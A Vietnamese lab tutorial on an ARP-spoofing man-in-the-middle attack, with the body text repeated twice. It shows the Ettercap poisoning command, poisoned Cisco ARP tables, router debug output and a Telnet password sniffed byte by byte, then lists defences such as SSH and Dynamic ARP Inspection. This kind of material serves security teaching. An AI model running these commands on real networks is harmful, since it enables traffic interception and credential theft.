Tweet
🧪 Thực hành Tấn công ARP Spoofing với Ettercap và Cisco Router
Mục tiêu: Thực hiện tấn công Man-in-the-Middle (MiTM) thông qua kỹ thuật ARP Spoofing để chứng minh mức độ nguy hiểm của giao thức không mã hóa như Telnet, đồng thời quan sát cách các router bị lừa khi bảng ARP bị "đầu độc". 1. Chuẩn bị mạng & xác thực ARP
Trước khi tiến hành tấn công, bạn cần đảm bảo bảng ARP của router đã được populate đầy đủ bằng cách thực hiện các gói tin ICMP:
router1> ping 172.16.1.1 router1> ping 172.16.1.11 router1> ping 172.16.1.66
Sau khi ping, dùng lệnh show arp để kiểm tra bảng ARP:
router1> show arp Protocol Address Age (min) Hardware Addr Type Interface Internet 172.16.1.1 38 5254.000a.4f20 ARPA Gi0/0 Internet 172.16.1.5 - 5254.0013.6cf9 ARPA Gi0/0 Internet 172.16.1.11 0 5254.001e.5655 ARPA Gi0/0 Internet 172.16.1.66 0 5254.0000.cdf1 ARPA Gi0/0
Lưu ý: Địa chỉ MAC của attacker (mitm-alpine) là 5254.0000.cdf1, địa chỉ MAC của gateway là 5254.000a.4f20.
2. Kích hoạt tấn công ARP Spoofing bằng Ettercap
Trên máy mitm-alpine (giả lập attacker), dùng công cụ ettercap để thực hiện tấn công. Câu lệnh sau sẽ đầu độc bảng ARP của cả router1 và gateway, khiến chúng hiểu nhầm attacker là đối phương:
sudo ettercap -T -i eth0 -M arp:remote /172.16.1.5/ /172.16.1.1/
Giải thích lệnh:
Kết quả đầu ra sẽ cho biết quá trình poisoning thành công như sau:
ARP poisoning victims: GROUP 1 : 172.16.1.5 52:54:00:13:6C:F9 GROUP 2 : 172.16.1.1 52:54:00:0A:4F:20
3. Xác minh bảng ARP bị poisoned
Kiểm tra lại bảng ARP trên cả router1 và gateway. Nếu thành công, bạn sẽ thấy cả hai thiết bị đều nhận diện attacker (mitm-alpine) là người kia:
router1> show arp Internet 172.16.1.1 0 5254.0000.cdf1 ARPA Gi0/0 ← bị đầu độc! gateway> show arp Internet 172.16.1.5 0 5254.0000.cdf1 ARPA Gi0/0 ← cũng bị đầu độc!
4. Bật debug trên Router để quan sát hành vi ARP
router1# debug arp router1# show logging ... IP ARP: rcvd rep src 172.16.1.1 5254.0000.cdf1, dst 172.16.1.5 Gi0/0
Bạn sẽ thấy gói ARP reply mang địa chỉ IP đúng nhưng MAC sai, đó là MAC của attacker – dấu hiệu rõ ràng của một cuộc ARP Spoofing.
5. Bắt gói Telnet và thu thập thông tin đăng nhập
Giờ đây attacker đã ở giữa luồng truyền thông tin (MitM). Hãy kiểm tra bằng cách từ router1 kết nối telnet đến một máy chủ:
router1# telnet 192.168.0.100
Quan sát cửa sổ ettercap hoặc dùng Wireshark bắt gói trên eth0, bạn sẽ thấy chuỗi ký tự “Password:” xuất hiện, theo sau là từng ký tự của mật khẩu được gởi từng byte một:
TCP 172.16.1.5:33894 --> 192.168.0.100:23 | AP (1) c TCP 172.16.1.5:33894 --> 192.168.0.100:23 | AP (1) i TCP 172.16.1.5:33894 --> 192.168.0.100:23 | AP (1) s ...
Mật khẩu "cisco" đã bị lộ!
🧠 Kết luận & Cảnh báo
Kỹ thuật ARP Spoofing cực kỳ nguy hiểm trong mạng LAN khi giao thức không được mã hóa như Telnet hoặc HTTP còn được sử dụng. Một attacker có thể:
Nếu bạn thấy bài lab này hữu ích, hãy chia sẻ trong nhóm để anh em cùng làm và nâng cao kỹ năng phân tích bảo mật! Đừng quên tắt debug khi hoàn thành:
router1# undebug all
Mục tiêu: Thực hiện tấn công Man-in-the-Middle (MiTM) thông qua kỹ thuật ARP Spoofing để chứng minh mức độ nguy hiểm của giao thức không mã hóa như Telnet, đồng thời quan sát cách các router bị lừa khi bảng ARP bị "đầu độc". 1. Chuẩn bị mạng & xác thực ARP
Trước khi tiến hành tấn công, bạn cần đảm bảo bảng ARP của router đã được populate đầy đủ bằng cách thực hiện các gói tin ICMP:
router1> ping 172.16.1.1 router1> ping 172.16.1.11 router1> ping 172.16.1.66
Sau khi ping, dùng lệnh show arp để kiểm tra bảng ARP:
router1> show arp Protocol Address Age (min) Hardware Addr Type Interface Internet 172.16.1.1 38 5254.000a.4f20 ARPA Gi0/0 Internet 172.16.1.5 - 5254.0013.6cf9 ARPA Gi0/0 Internet 172.16.1.11 0 5254.001e.5655 ARPA Gi0/0 Internet 172.16.1.66 0 5254.0000.cdf1 ARPA Gi0/0
Lưu ý: Địa chỉ MAC của attacker (mitm-alpine) là 5254.0000.cdf1, địa chỉ MAC của gateway là 5254.000a.4f20.
2. Kích hoạt tấn công ARP Spoofing bằng Ettercap
Trên máy mitm-alpine (giả lập attacker), dùng công cụ ettercap để thực hiện tấn công. Câu lệnh sau sẽ đầu độc bảng ARP của cả router1 và gateway, khiến chúng hiểu nhầm attacker là đối phương:
sudo ettercap -T -i eth0 -M arp:remote /172.16.1.5/ /172.16.1.1/
Giải thích lệnh:
- -T: chế độ text UI
- -i eth0: chọn interface
- -M arp:remote: chế độ tấn công ARP remote
- /IP_A/ /IP_B/: hai mục tiêu sẽ bị "giới thiệu sai" địa chỉ MAC
Kết quả đầu ra sẽ cho biết quá trình poisoning thành công như sau:
ARP poisoning victims: GROUP 1 : 172.16.1.5 52:54:00:13:6C:F9 GROUP 2 : 172.16.1.1 52:54:00:0A:4F:20
3. Xác minh bảng ARP bị poisoned
Kiểm tra lại bảng ARP trên cả router1 và gateway. Nếu thành công, bạn sẽ thấy cả hai thiết bị đều nhận diện attacker (mitm-alpine) là người kia:
router1> show arp Internet 172.16.1.1 0 5254.0000.cdf1 ARPA Gi0/0 ← bị đầu độc! gateway> show arp Internet 172.16.1.5 0 5254.0000.cdf1 ARPA Gi0/0 ← cũng bị đầu độc!
4. Bật debug trên Router để quan sát hành vi ARP
router1# debug arp router1# show logging ... IP ARP: rcvd rep src 172.16.1.1 5254.0000.cdf1, dst 172.16.1.5 Gi0/0
Bạn sẽ thấy gói ARP reply mang địa chỉ IP đúng nhưng MAC sai, đó là MAC của attacker – dấu hiệu rõ ràng của một cuộc ARP Spoofing.
5. Bắt gói Telnet và thu thập thông tin đăng nhập
Giờ đây attacker đã ở giữa luồng truyền thông tin (MitM). Hãy kiểm tra bằng cách từ router1 kết nối telnet đến một máy chủ:
router1# telnet 192.168.0.100
Quan sát cửa sổ ettercap hoặc dùng Wireshark bắt gói trên eth0, bạn sẽ thấy chuỗi ký tự “Password:” xuất hiện, theo sau là từng ký tự của mật khẩu được gởi từng byte một:
TCP 172.16.1.5:33894 --> 192.168.0.100:23 | AP (1) c TCP 172.16.1.5:33894 --> 192.168.0.100:23 | AP (1) i TCP 172.16.1.5:33894 --> 192.168.0.100:23 | AP (1) s ...
Mật khẩu "cisco" đã bị lộ!
🧠 Kết luận & Cảnh báo
Kỹ thuật ARP Spoofing cực kỳ nguy hiểm trong mạng LAN khi giao thức không được mã hóa như Telnet hoặc HTTP còn được sử dụng. Một attacker có thể:
- Đọc toàn bộ lưu lượng unencrypted
- Thu thập tài khoản, mật khẩu, thậm chí session cookies
- Gây gián đoạn hoặc điều hướng lưu lượng
- Dùng giao thức mã hóa: SSH thay Telnet, HTTPS thay HTTP.
- Triển khai Dynamic ARP Inspection (DAI): trên switch layer 2.
- Dùng static ARP entries: cho các thiết bị quan trọng.
- Sử dụng IDS/IPS và giám sát ARP bất thường.
Nếu bạn thấy bài lab này hữu ích, hãy chia sẻ trong nhóm để anh em cùng làm và nâng cao kỹ năng phân tích bảo mật! Đừng quên tắt debug khi hoàn thành:
router1# undebug all
Attached Files